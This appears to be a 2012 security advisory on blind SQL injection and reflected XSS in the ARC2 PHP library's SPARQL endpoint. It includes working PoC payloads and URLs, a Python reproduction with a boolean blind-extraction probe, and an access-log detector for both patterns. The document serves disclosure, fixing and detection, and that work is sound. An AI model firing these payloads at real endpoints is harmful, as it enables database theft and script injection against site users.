CVE-2012-5873: ush.it - a beautiful place
ARC (aka ARC2) through 2011-12-01 allows reflected XSS via the end_point.php query parameter in an output=htmltab action.
November 22, 2012 at 11:34 am - Filed under Hacks - 1408 words, reading time ~4 minutes
Simone “negator” Onofri and Luca “beinux3” Napolitano found multiple issues in ARC2, a PHP library that provides RDF and SPARQL functionality to PHP applications and uses MySQL as its backend. The vulnerabilities found are a blind SQL injection and a reflected XSS.
ARC v2011-12-01 Multiple vulnerabilities
Name: ARC2 v2011-12-01 Multiple vulnerabilities
Systems Affected: ARC2 v2011-12-01
Severity: High
Impact: High 10/10, vector (AV:N/AC:L/Au:N/C:C/I:C/A:C)
Vendor: https://github.com/semsol/arc2
Advisory: http://www.ush.it/team/negator/hack-arc_2011-12-01/adv.txt
Author: Simone “negator” Onofri, Luca “beinux3” Napolitano
Date: 20121123
I. BACKGROUND
ARC is a flexible RDF system for semantic web and PHP practitioners. It’s free, open-source, easy to use, and runs in most web server environments.
II. DESCRIPTION
ARC2 version 2011-12-01 and earlier is affected by a Blind SQL Injection and a Reflected Cross Site Scripting vulnerability, both reachable through the SPARQL+ endpoint.
III. ANALYSIS
Summary:
A) Blind SQL Injection (SQLI) Vulnerability
B) Reflected Cross Site Scripting (XSS) Vulnerability
A) Blind SQL Injection (SQLI) Vulnerability
A blind SQL Injection vulnerability exists in ARC version v2011-12-01.
ARC stores triples in a MySQL database and translates SPARQL queries into SQL. To ease debugging, the developer appended SQL comments that repeat the raw values of the query pattern. Because these values are not escaped, data placed in a SPARQL WHERE clause can close the comment early (with "*/") and inject arbitrary SQL into the generated query.
In the getTriplePatternSQL() function of ARC2_StoreSelectQueryHandler.php, the query sent to MySQL is always annotated this way (there is no option to disable it): comments containing the pattern's S, P and O values (Subject, Predicate, Object; the semantic web triple concept) are plugged into the generated SQL.
SPARQL Query:
–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–
PREFIX iam: <http://x>
SELECT * WHERE {
   ?user iam:user "lol*/ OR (SELECT sleep(5))=1--" .
} LIMIT 100
–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–
Actual MySQL Query:
–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–
SELECT T_0_0_0.s AS `user`, T_0_0_0.s_type AS `user type` FROM arc_tests_triple T_0_0_0 WHERE (T_0_0_0.p = 0) /*FIX-IT http://xuser */ AND (T_0_0_0.o = 0) /*FIX-IT lol*/ OR (SELECT sleep(5))=1-- */ LIMIT 0,100
–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–
What follows is a demo exploitation through the ARC2 store API, the same code path used by the SPARQL endpoint.
–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–
$query = 'PREFIX iam: <http://x>
SELECT * WHERE {
   ?user iam:user "lol*/ OR (SELECT sleep(5))=1--" .
   ?password iam:hasPassword "password" .
} LIMIT 100';
$store->setUp();
$store->query($query, 'rows');
–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–
The issue can also be exploited in the standard blind way, for example with TRUE/FALSE conditions (tautologies) instead of the time delay used above.
–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–
http://www.example.com/end_point.php?query=PREFIX+iam%3A+<http%3A%2F%2Fx>%0D%0ASELECT+*+WHERE+%7B%0D%0A+++%3Fuser+iam%3Auser+"lol*%2F+OR+%28SELECT+sleep%285%29%29%3D1--".%0D%0A%7D%0D%0ALIMIT+1&output=&jsonp=&key=&show_inline=1
–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–
The CVSS v2 score for Blind SQL Injection is: High 10/10, vector (AV:N/AC:L/Au:N/C:C/I:C/A:C).
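The comment break-out described above, reproduced as an added example that is not part of the advisory or of ARC2. ARC2 is PHP, but the example is written in Python against an in-memory SQLite database so that it runs stand-alone; the table layout, the FIX-IT comment format and the `vulnerable_sql()` / `hardened_sql()` builders are assumptions that mirror the reported pattern (the comparison itself is bound safely, the debug comment repeats the raw object value). SQLite has no sleep(), so the blind probe uses the boolean TRUE/FALSE technique rather than the time delay of the original PoC.

```python
import sqlite3

# Constructed sample store (not ARC's schema): three triples.
TRIPLES = [
    ("http://ex/alice", "http://xuser", "alice"),
    ("http://ex/bob", "http://xuser", "bob"),
    ("http://ex/doc1", "http://xtitle", "lol"),
]


def make_store():
    """In-memory SQLite stand-in for ARC's MySQL triple table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE triple (s TEXT, p TEXT, o TEXT)")
    conn.executemany("INSERT INTO triple VALUES (?, ?, ?)", TRIPLES)
    return conn


def vulnerable_sql(o_value):
    """Mirrors the pattern reported for getTriplePatternSQL(): the
    comparison is a bound parameter, but a debug comment repeats the raw
    object value, so '*/' inside the value closes the comment early and
    everything after it is parsed as SQL."""
    sql = "SELECT s FROM triple WHERE (o = ?) /*FIX-IT %s */" % o_value
    return sql, (o_value,)


def hardened_sql(o_value):
    """Hypothetical fix: never let user data terminate the comment.
    Dropping the debug comment altogether is the simpler option."""
    safe = o_value.replace("*/", "* /")
    sql = "SELECT s FROM triple WHERE (o = ?) /*FIX-IT %s */" % safe
    return sql, (o_value,)


def count_rows(conn, builder, o_value):
    """Build the query with `builder` and return how many rows it yields."""
    sql, params = builder(o_value)
    return len(conn.execute(sql, params).fetchall())


def blind_probe(conn, condition):
    """Boolean-based blind probe through the vulnerable builder: the
    injected OR makes the row count non-zero exactly when `condition`
    evaluates to true inside the database, even though the bound value
    itself matches no triple."""
    payload = "lol*/ OR (%s)-- " % condition
    return count_rows(conn, vulnerable_sql, payload) > 0


def demo():
    conn = make_store()
    tautology = "lol*/ OR 1=1-- "
    return {
        # comment closed by the payload: OR 1=1 returns every triple
        "vulnerable": count_rows(conn, vulnerable_sql, tautology),
        # comment kept intact: the payload is just an unmatched literal
        "hardened": count_rows(conn, hardened_sql, tautology),
        # two blind probes inferring the table size one condition at a time
        "three_triples": blind_probe(conn, "(SELECT count(*) FROM triple) = 3"),
        "four_triples": blind_probe(conn, "(SELECT count(*) FROM triple) = 4"),
    }


if __name__ == "__main__":
    print(demo())
```

The hardened builder still executes the query with the same bound parameter; only the comment changes, which is why the number of returned rows drops from three to zero. Each `blind_probe()` call is one yes/no question, so extracting data this way costs one request per bit of information, which is what the "standard blind way" mentioned above amounts to in practice.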
B) Reflected Cross Site Scripting (XSS) Vulnerability
A Reflected Cross Site Scripting vulnerability exists in the SPARQL endpoint of ARC version v2011-12-01.
The GET variable “query” is reflected in the page without proper encoding when the “output” option is set to "htmltab": a query that the parser rejects is echoed back verbatim inside the error message.
–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–
<div class="results"> Could not properly handle "<script src=/lol.it/x><script>" in ARC2_SPARQLPlusParser </div>
–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–
PoC URL that exploits this vulnerability:
–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–
http://www.example.com/end_point.php?query=<script+src%3D%2Flol.it%2Fx><script>&output=htmltab&jsonp=&key=&show_inline=1
–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–8<–
The CVSS v2 score for Reflected Cross Site Scripting is Medium 4.3/10, vector (AV:N/AC:M/Au:N/C:N/I:P/A:N).
IV. DETECTION
ARC2 v2011-12-01 and possibly earlier versions are vulnerable.
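A log-side check for both PoC patterns, added here as an example and not taken from the advisory or from ARC2. It parses Apache combined-format access-log lines, decodes the query string and flags a request when a SPARQL string literal in the "query" parameter contains the comment terminator "*/" (the SQLi vector above) or when "output=htmltab" is combined with an HTML-looking tag in "query" (the XSS vector). The log lines are constructed; the endpoint path and parameter names come from the PoC URLs above, and the log format and confidence labels are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-format lines (not real traffic). Requests 2 and 3
# are the advisory's PoC URLs, percent-encoded as a client would send them;
# request 1 is a benign htmltab query and request 4 a SPARQL 1.1 property path.
SAMPLE_LOG = """\
203.0.113.5 - - [23/Nov/2012:10:00:01 +0100] "GET /end_point.php?query=PREFIX+iam%3A+%3Chttp%3A%2F%2Fx%3E+SELECT+*+WHERE+%7B+%3Fs+iam%3Auser+%3Fo+%7D+LIMIT+10&output=htmltab HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [23/Nov/2012:10:00:02 +0100] "GET /end_point.php?query=PREFIX+iam%3A+%3Chttp%3A%2F%2Fx%3E%0D%0ASELECT+*+WHERE+%7B+%3Fuser+iam%3Auser+%22lol*%2F+OR+%28SELECT+sleep%285%29%29%3D1--%22.%7D+LIMIT+1&output=&show_inline=1 HTTP/1.1" 200 301 "-" "curl/7.26.0"
203.0.113.9 - - [23/Nov/2012:10:00:03 +0100] "GET /end_point.php?query=%3Cscript+src%3D%2Flol.it%2Fx%3E%3Cscript%3E&output=htmltab&show_inline=1 HTTP/1.1" 200 288 "-" "curl/7.26.0"
203.0.113.7 - - [23/Nov/2012:10:00:04 +0100] "GET /end_point.php?query=SELECT+%3Fn+WHERE+%7B+%3Fx+foaf%3Aknows*%2Ffoaf%3Aname+%3Fn+%7D&output=json HTTP/1.1" 200 640 "-" "Mozilla/5.0"
"""

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# SPARQL string literals, double- or single-quoted, with backslash escapes.
STRING_LITERAL = re.compile(r'"(?:[^"\\]|\\.)*"|\'(?:[^\'\\]|\\.)*\'')

# An HTML-looking tag: '<', optional '/', a tag name, then whitespace, '>' or '/'.
# IRIs such as <http://x> do not match because the name is followed by ':'.
HTML_TAG = re.compile(r"<\s*/?\s*[a-z][a-z0-9]*(?=[\s>/])", re.I)


def sqli_indicator(query):
    """'*/' inside a string literal is the reported vector (high confidence).
    '*/' elsewhere can be a legitimate SPARQL 1.1 property path such as
    foaf:knows*/foaf:name, so it is reported at low confidence only."""
    for lit in STRING_LITERAL.findall(query):
        if "*/" in lit:
            return "high"
    return "low" if "*/" in query else None


def analyse_request(target):
    """Return (CVE, confidence) findings for one request target."""
    parts = urlsplit(target)
    if not parts.path.endswith("/end_point.php"):
        return []
    params = parse_qs(parts.query, keep_blank_values=True)
    query = params.get("query", [""])[0]
    output = params.get("output", [""])[0]
    findings = []
    confidence = sqli_indicator(query)
    if confidence:
        findings.append(("CVE-2012-5872", confidence))
    if output == "htmltab" and HTML_TAG.search(query):
        findings.append(("CVE-2012-5873", "high"))
    return findings


def scan_log(text):
    """Yield (ip, timestamp, findings) for every suspicious request."""
    hits = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        findings = analyse_request(m.group("target"))
        if findings:
            hits.append((m.group("ip"), m.group("ts"), findings))
    return hits


if __name__ == "__main__":
    for ip, ts, findings in scan_log(SAMPLE_LOG):
        print(ip, ts, findings)
```

The literal-only rule matters because "*/" is valid SPARQL outside strings (property paths), and the colon lookahead keeps IRIs in angle brackets from being mistaken for tags; both are the false positives a detection engineer would hit first when running this over real endpoint traffic. A POST to the endpoint carries the query in the body rather than the URL, which an access log does not record, so this check only covers GET requests like the PoCs.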
V. WORKAROUND
Update ARC2 to the latest release or manually fix ARC2_StoreEndpoint.php and the other files as described by commit ID 0a39922edaf6a72c5af60aaeaff7bc4e92a6d342.
https://github.com/semsol/arc2/commit/0a39922edaf6a72c5af60aaeaff7bc4e92a6d342
VI. VENDOR RESPONSE
Issues fixed in Git commit 0a39922.
VII. CVE INFORMATION
The Common Vulnerabilities and Exposures (CVE) project has assigned:
- The name CVE-2012-5872 to Blind SQL Injection Vulnerability.
- The name CVE-2012-5873 to Reflected Cross Site Scripting Vulnerability.
This is a candidate for inclusion in the CVE list http://cve.mitre.org, which standardizes names for security problems.
VIII. DISCLOSURE TIMELINE
20121110 Bug discovered
20121110 Vendor contacted
20121111 Vendor responded
20121111 Vendor fixed SQLI
20121115 Vendor fixed XSS
20121115 Advisory release scheduled for 20121123
20121123 Advisory released
IX. REFERENCES
Well you know what SQLi and XSS are, right?
X. CREDIT
Simone “negator” Onofri is credited for the discovery of this vulnerability.
Luca “beinux3” Napolitano is credited for the discovery of this vulnerability.
Thanks to Francesco “ascii” Ongaro for revision and fine editing.
Simone “negator” Onofri web site: http://simone.onofri.net/ mail: simone AT onofri DOT net
Luca “beinux3” Napolitano web site: http://www.network-tsunami.com/ mail: beinux3 AT gmail DOT com
Francesco “ascii” Ongaro web site: http://www.ush.it/ mail: ascii AT ush DOT it
XI. LEGAL NOTICES
Copyright © 2012
Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without my express written consent. If you wish to reprint the whole or any part of this alert in any medium other than electronically, please email me for permission.
Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.